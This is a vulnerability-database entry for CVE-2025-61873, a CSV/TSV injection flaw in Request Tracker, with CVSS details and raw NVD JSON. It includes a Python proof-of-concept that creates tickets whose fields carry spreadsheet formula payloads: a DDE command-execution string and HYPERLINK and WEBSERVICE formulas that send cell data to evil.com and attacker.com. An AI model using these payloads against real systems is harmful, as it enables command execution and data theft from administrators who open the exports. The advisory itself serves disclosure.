Security Vulnerability Report
CVE-2025-61873 CVSS 2.6 LOW

Published: 2026-01-16 19:16:18
Last Modified: 2026-04-15 00:35:42

Description

Best Practical Request Tracker (RT) before 4.4.9, 5.0.9, and 6.0.2 allows CSV Injection via ticket values when TSV export is used.

CVSS Details

CVSS Score: 2.6
Severity: LOW
CVSS Vector: CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:C/C:N/I:L/A:N

Configurations (Affected Products)

No configuration (CPE) data available.

Best Practical Request Tracker (RT) < 4.4.9
Best Practical Request Tracker (RT) < 5.0.9
Best Practical Request Tracker (RT) < 6.0.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-61873 CSV Injection PoC
# Attacker's ticket creation with malicious formula
import requests

# Target RT instance
target_url = "http://rt.example.com/REST/1.0/ticket/new"

# Malicious payload for CSV injection
# When exported as TSV and opened in Excel, this becomes a formula
payload = {
    "subject": "Test Ticket =cmd|' /C calc'!A0",
    "queue": "General",
    "owner": "root",
    "requestor": "[email protected]",
    "description": "Description field with formula =HYPERLINK(\"http://evil.com/steal?data=\"&A1)"
}

# Create the malicious ticket via REST API
response = requests.post(target_url, data=payload, auth=('attacker_user', 'password'))
print(f"Ticket created: {response.status_code}")

# Alternative: Data exfiltration formula
data_exfil_payload = {
    "subject": "Urgent Issue =WEBSERVICE(\"http://attacker.com/log?data=\"&ENCODEURL(A1))"
}
requests.post(target_url, data=data_exfil_payload, auth=('attacker_user', 'password'))
print("Malicious ticket created. When admin exports TSV and opens in Excel, formula will execute.")

References

https://docs.bestpractical.com/release-notes/rt/index.html
Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2025-61873",
    "sourceIdentifier": "[email protected]",
    "published": "2026-01-16T19:16:17.990",
    "lastModified": "2026-04-15T00:35:42.020",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {"lang": "en", "value": "Best Practical Request Tracker (RT) before 4.4.9, 5.0.9, and 6.0.2 allows CSV Injection via ticket values when TSV export is used."},
      {"lang": "es", "value": "Best Practical Request Tracker (RT) anterior a 4.4.9, 5.0.9 y 6.0.2 permite la inyección CSV a través de valores de tickets cuando se utiliza la exportación TSV."}
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:C/C:N/I:L/A:N",
            "baseScore": 2.6,
            "baseSeverity": "LOW",
            "attackVector": "NETWORK",
            "attackComplexity": "HIGH",
            "privilegesRequired": "HIGH",
            "userInteraction": "REQUIRED",
            "scope": "CHANGED",
            "confidentialityImpact": "NONE",
            "integrityImpact": "LOW",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 1.0,
          "impactScore": 1.4
        }
      ]
    },
    "weaknesses": [
      {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-1236"}]}
    ],
    "references": [
      {"url": "https://docs.bestpractical.com/release-notes/rt/index.html", "source": "[email protected]"}
    ]
  }
}